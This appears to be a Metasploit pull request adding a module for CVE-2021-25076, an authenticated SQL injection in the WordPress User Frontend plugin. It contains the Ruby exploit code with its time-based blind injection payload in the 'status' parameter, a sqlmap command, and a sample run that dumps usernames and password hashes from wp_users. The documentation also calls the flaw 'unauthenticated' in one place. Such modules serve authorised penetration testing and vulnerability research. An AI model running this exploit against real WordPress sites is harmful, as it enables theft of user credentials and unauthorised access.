### PR TITLE
Wordpress Plugin user_frontend authenticated sqli (CVE-2021-25076)

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -47,5 +47,7 @@ nextgen-gallery
 simple-backup
 subscribe-to-comments
 easy-wp-smtp
+wp-user-frontend
 duplicator_download
+custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart

--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -49,5 +49,4 @@ subscribe-to-comments
 easy-wp-smtp
 wp-user-frontend
 duplicator_download
-custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart

--- a/documentation/modules/auxiliary/scanner/http/wp_user_frontend_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_user_frontend_sqli.md
@@ -1,0 +1,86 @@
+## Vulnerable Application
+
+User Frontend, a WordPress plugin,
+prior to 3.5.26 is affected by an authenticated SQL injection via the
+`status` parameter.
+
+Remote attackers can exploit this vulnerability to dump usernames and password hashes
+from the`wp_users` table of the affected WordPress installation. These password hashes
+can then be cracked offline using tools such as Hashcat to obtain valid login
+credentials for the affected WordPress installation.
+
+A vulnerable version (3.5.25) of the plugin can be downloaded
+[here](https://downloads.wordpress.org/plugin/wp-user-frontend.3.5.25.zip)
+
+The output from running this module will be somewhat similar to the following `sqlmap` command:
+
+```
+sqlmap --dbms=mysql -u "http://1.1.1.1/wp-admin/admin.php?page=wpuf_subscribers&status=1*&post_ID=1" --technique T -T wp_users --cookie <cookie> --dump
+```
+
+## Verification Steps
+
+1. Install the plugin, use defaults
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/wp_user_frontend_sqli`
+4. Do: `set rhosts [ip]`
+5. Optionally set `USER_COUNT` to the number of users you want to dump the credentials of.
+6. Do: `run`
+7. *Verify* that `USER_COUNT` number of users's usernames and password hashes are gathered from the `wp_users` table of the target WordPress installation.
+
+## Options
+
+### ACTION: List Users
+
+This action exploits the unauthenticated SQL injection and lists `USER_COUNT`
+users and password hashes from the `wp_users` table of the affected WordPress installation.
+
+### PASSWORD
+
+Password of a wordpress user. Defaults to ''.
+
+### USER_COUNT
+
+If action `List Users` is selected (default), this is the number of users to enumerate the credentials of.
+The larger this number, the more time it will take for the module to run.  Defaults to `3`.
+
+### USERNAME
+
+Username of a wordpress user. Defaults to ''.
+
+## Scenarios
+
+### User Frontend 3.5.26 on WordPress 5.7.5 on Ubuntu 20.04
+```
+resource (userfrontend.rb)> use auxiliary/scanner/http/wp_user_frontend_sqli
+resource (userfrontend.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (userfrontend.rb)> set verbose true
+verbose => true
+resource (userfrontend.rb)> set username admin
+username => admin
+resource (userfrontend.rb)> set password admin
+password => admin
+resource (userfrontend.rb)> run
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/wp-user-frontend/readme.txt
+[*] Found version 3.5.25 in the plugin
+[+] The target appears to be vulnerable.
+[*] Attempting Login
+[*] Enumerating Usernames and Password Hashes
+[!] Each user will take about 5-10 minutes to enumerate. Be patient.
+[*] {SQLi} Executing (select group_concat(rQ) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) rQ from wp_users limit 3) DZAJLImA)
+[*] {SQLi} Time-based injection: expecting output of length 124
+[+] Dumped table contents:
+wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+ editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/wp_user_frontend_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_user_frontend_sqli.rb
@@ -1,0 +1,127 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress User Frontend status Authenticated SQLi',
+        'Description' => %q{
+          User Frontend, a WordPress plugin,
+          prior to 3.5.26 is affected by an authenticated SQL injection via the
+          `status` parameter.
+          Remote attackers can exploit this vulnerability to dump usernames and password hashes
+          from the`wp_users` table of the affected WordPress installation. These password hashes
+          can then be cracked offline using tools such as Hashcat to obtain valid login
+          credentials for the affected WordPress installation.
+        },
+        'Author' => [
+          'h00die', # msf module
+          'Hacker5preme (Ron Jost)', # edb PoC
+          'Krzysztof Zając (kazet)', # Original bug discovery and writeup
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-25076'],
+          ['URL', 'https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-25076/README.md'],
+          ['URL', 'https://kazet.cc/2022/02/03/fuzzing-wordpress-plugins.html'],
+          ['URL', 'https://plugins.trac.wordpress.org/changeset/2648715'],
+          ['EDB', '50772'],
+          ['WPVDB', '6d3eeba6-5560-4380-a6e9-f008a9112ac6'],
+        ],
+        'Actions' => [
+          ['List Users', { 'Description' => 'Queries username, password hash for USER_COUNT users' }]
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2021-12-27',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options [
+      OptInt.new('USER_COUNT', [true, 'Number of user credentials to enumerate', 3]),
+      OptString.new('USERNAME', [true, 'A valid username', nil]),
+      OptString.new('PASSWORD', [true, 'Valid password for the provided username', nil]),
+    ]
+  end
+
+  def check_host(_ip)
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
+    end
+
+    checkcode = check_plugin_version_from_readme('wp-user-frontend', '3.5.26')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Safe('User Frontend version not vulnerable')
+    end
+
+    checkcode
+  end
+
+  def run_host(ip)
+    print_status('Attempting Login')
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    fail_with(Failure::NoAccess, 'Invalid login, check credentials') if cookie.nil?
+
+    id = Rex::Text.rand_text_numeric(1..20)
+    rtext = Rex::Text.rand_text_alpha(4..8)
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: {}) do |payload| # hex_encode_strings: true }) do |payload|
+      res = send_request_cgi({
+        'method' => 'GET',
+        'cookie' => cookie,
+        'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin.php'),
+        'vars_get' => {
+          'page' => 'wpuf_subscribers',
+          'status' => "#{id}\" AND (SELECT #{Rex::Text.rand_text_numeric(4..20)} FROM (SELECT(#{payload}))#{rtext}) AND \"#{rtext}\"=\"#{rtext}",
+          'post_ID' => 1
+        }
+      })
+      fail_with(Failure::Unreachable, 'Connection failed') unless res
+    end
+
+    unless @sqli.test_vulnerable
+      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
+      return
+    end
+    columns = ['user_login', 'user_pass']
+
+    print_status('Enumerating Usernames and Password Hashes')
+    print_warning('Each user will take about 5-10 minutes to enumerate. Be patient.')
+    data = @sqli.dump_table_fields('wp_users', columns, '', datastore['USER_COUNT'])
+
+    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
+    data.each do |user|
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'Wordpress',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      table << user
+    end
+    print_good('Dumped table contents:')
+    print_line(table.to_s)
+  end
+end


### PR DESCRIPTION
super simple sqli in wordpress plugin user frontend. Simply download, install, activate and youre good to go.

## Verification

List the steps needed to make sure this thing works

- [ ] Install the plugin, use defaults
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/wp_user_frontend_sqli`
- [ ] Do: `set rhosts [ip]`
- [ ] Optionally set `USER_COUNT` to the number of users you want to dump the credentials of.
- [ ] Do: `run`
- [ ] *Verify* that `USER_COUNT` number of users's usernames and password hashes are gathered from the `wp_users` table of the target WordPress installation.
- [ ] **Document** is good
